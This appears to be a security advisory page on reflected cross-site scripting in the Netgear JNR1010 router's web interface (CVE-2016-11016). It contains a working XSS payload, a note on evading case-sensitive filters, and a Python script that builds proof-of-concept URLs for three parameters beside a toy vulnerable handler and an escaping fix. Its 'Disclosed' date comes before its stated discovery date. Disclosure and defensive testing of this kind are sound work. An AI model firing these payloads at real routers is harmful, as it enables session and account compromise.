SecurinZero Days
Zero-Day Research / CVE-2016-11016
Medium · CVSS 6.1 · Patched · EPSS 0.00681%

    Multiple Cross-Site Scripting in Netgear Router

    NETGEAR JNR1010 devices before 1.0.0.32 allow webproc?getpage= XSS.

CVE ID: CVE-2016-11016
CVSS v3.1: 6.1 Medium
Vendor: NetGear
CWE: CWE-79
Disclosed: Oct 25, 2015
Status: Fixed
    01/Description


Multiple reflected cross-site scripting (XSS) vulnerabilities were identified in the web management interface of the Netgear JNR1010 router, firmware version 1.0.0.24. Three GET parameters of the webproc CGI endpoint (getpage, var:page and var:menu) are echoed back into the response without output encoding.

Vendor: NetGear
Affected Product: JNR1010_firmware
CVE: CVE-2016-11016
Securin ID: 2016-CSW-01-1014
Status: Fixed
Date: October 25, 2015
Severity: Medium
CVSS Score: 6.1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
    02/Proof of Concept


CVSS 3.1: 6.1 (Medium) · Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N · Scope: Changed · Impact: C:L / I:L / A:N

Inject the JavaScript payload "></scripT><scripT>alert(1)</scripT> into the getpage parameter of the URL http://routerip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 and open it in a browser. The parameter value is echoed into the response unencoded, so the leading quote terminates the attribute it lands in and the injected script tags execute (reflected cross-site scripting). The mixed-case tag name is deliberate: HTML tag names are case-insensitive, so the payload still runs, while a case-sensitive blocklist that looks only for the literal string <script> would not match it.

PoC · Exploitation Steps

01 Note: the var:page and var:menu parameters are injectable with the same JavaScript payload in the same way, and each can serve as a vehicle for further attack.
02 Issue 1: The GET parameter getpage in the URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to cross-site scripting (XSS).
03 Figure 01: XSS payload injected into the getpage parameter and echoed back in the URL contained in the response.
04 Figure 02: XSS payload reflected and executed in the browser.
05 Issue 2: The GET parameter var:page in the URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to cross-site scripting (XSS).
06 Figure 03: XSS payload injected into the var:page parameter and echoed back in the URL contained in the response.
07 Issue 3: The GET parameter var:menu in the URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to cross-site scripting (XSS).
08 Figure 04: XSS payload injected into the var:menu parameter and echoed back in the URL contained in the response.
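The following is an added example, not code from Securin's advisory or from Netgear's firmware. It builds the three PoC URLs named above (one per injectable parameter, with the advisory's payload URL-encoded), then contrasts a toy model of the flawed handler, which concatenates getpage, var:page and var:menu straight into a link in the page, with the same handler using contextual HTML encoding. The handler bodies, the page layout they emit and the hostname router-ip are assumptions made for the example; the real webproc binary is not available here. The reflection check is the one a tester would run against a captured response: is the payload present byte-for-byte, or only in encoded form?

```python
"""
Added example (not Securin's or Netgear's code): PoC URL construction for
CVE-2016-11016, plus a toy vulnerable handler beside its hardened form.
Assumed: the handler bodies, the emitted page layout, the host 'router-ip'.
"""
import html
from urllib.parse import urlencode, urlsplit, parse_qsl

# Payload exactly as given in the advisory. Tag names are case-insensitive in
# HTML, so the mixed-case <scripT> still executes.
PAYLOAD = '"></scripT><scripT>alert(1)</scripT>'

BASE_URL = "http://router-ip/cgibin/webproc"  # 'router-ip' is a placeholder
BASE_PARAMS = {                                # query string from the advisory
    "getpage": "html/page.htm",
    "var:page": "RST_status",
    "var:menu": "advanced",
    "t": "1445843230593",
}
INJECTABLE = ("getpage", "var:page", "var:menu")  # the three parameters named


def build_poc_urls(payload: str = PAYLOAD) -> dict:
    """One PoC URL per injectable parameter, payload URL-encoded."""
    urls = {}
    for name in INJECTABLE:
        params = dict(BASE_PARAMS)
        params[name] = payload
        urls[name] = f"{BASE_URL}?{urlencode(params)}"
    return urls


def params_from_url(url: str) -> dict:
    """Decode the query string the way a CGI handler would see it."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def vulnerable_webproc(params: dict) -> str:
    """Toy model of the flaw (assumed): the three parameters are concatenated
    into an href in the response with no encoding at all."""
    link = (f"/cgibin/webproc?getpage={params['getpage']}"
            f"&var:page={params['var:page']}&var:menu={params['var:menu']}")
    return f'<html><body><a href="{link}">reload</a></body></html>'


def fixed_webproc(params: dict) -> str:
    """Same handler with contextual output encoding: every reflected value is
    HTML-escaped, quotes included, before it is placed inside the attribute."""
    esc = {k: html.escape(v, quote=True) for k, v in params.items()}
    link = (f"/cgibin/webproc?getpage={esc['getpage']}"
            f"&var:page={esc['var:page']}&var:menu={esc['var:menu']}")
    return f'<html><body><a href="{link}">reload</a></body></html>'


def is_reflected_unencoded(body: str, payload: str = PAYLOAD) -> bool:
    """True when the payload reaches the response byte-for-byte, i.e. the
    closing quote and the script tags are live markup, not escaped text."""
    return payload in body


def check_handler(handler) -> dict:
    """Run every PoC URL through a handler; returns {parameter: vulnerable?}."""
    return {
        name: is_reflected_unencoded(handler(params_from_url(url)))
        for name, url in build_poc_urls().items()
    }


if __name__ == "__main__":
    for name, url in build_poc_urls().items():
        print(f"{name:9s} -> {url}")
    print("vulnerable handler:", check_handler(vulnerable_webproc))
    print("fixed handler:     ", check_handler(fixed_webproc))
```

Against a live device the same check_handler logic applies with the handler replaced by an HTTP GET of each PoC URL: a response that contains the payload verbatim is vulnerable, one that contains only `&quot;&gt;&lt;/scripT&gt;...` is not. The hardened handler escapes rather than filters, which is why the mixed-case tag gives it no trouble.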
    03/Impact


A reflected cross-site scripting (XSS) vulnerability lets an attacker who can get a victim to open a crafted link execute attacker-controlled script in the victim's browser within the origin of the Netgear web management UI. As the CVSS vector records, no privileges are needed but user interaction is required (UI:R), and the scope is changed because the script runs in the router's UI rather than in the attacker's own origin; the rated impact is limited loss of confidentiality and integrity (C:L / I:L) with no availability impact.

    04/Remediation


Download the latest firmware from Netgear and update the JNR1010 as per the vendor advisory; the fix shipped in firmware version 1.0.0.32, so confirm after the upgrade that the router reports 1.0.0.32 or later.

    Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11016, contact disclose@securin.io
    05/Disclosure Timeline


    Oct 28, 2015

    Discovered in Netgear Router Firmware Version 1.0.0.24

    Oct 28, 2015

    Reported to vendor

    Nov 03, 2015

    Netgear technical team started addressing the issue after several follow-ups

    Dec 13, 2015

Vulnerability fixed by Netgear

    Dec 30, 2015

    Updated Netgear Router JNR1010 version 1.0.0.32 was released

    Disclosed 63 days after discovery

    06/References


NVD: CVE-2016-11016, https://nvd.nist.gov/vuln/detail/CVE-2016-11016

Securin VI: Full Technical Analysis, https://vi.securin.io

    © 2026 Securin Inc · CVE Numbering Authority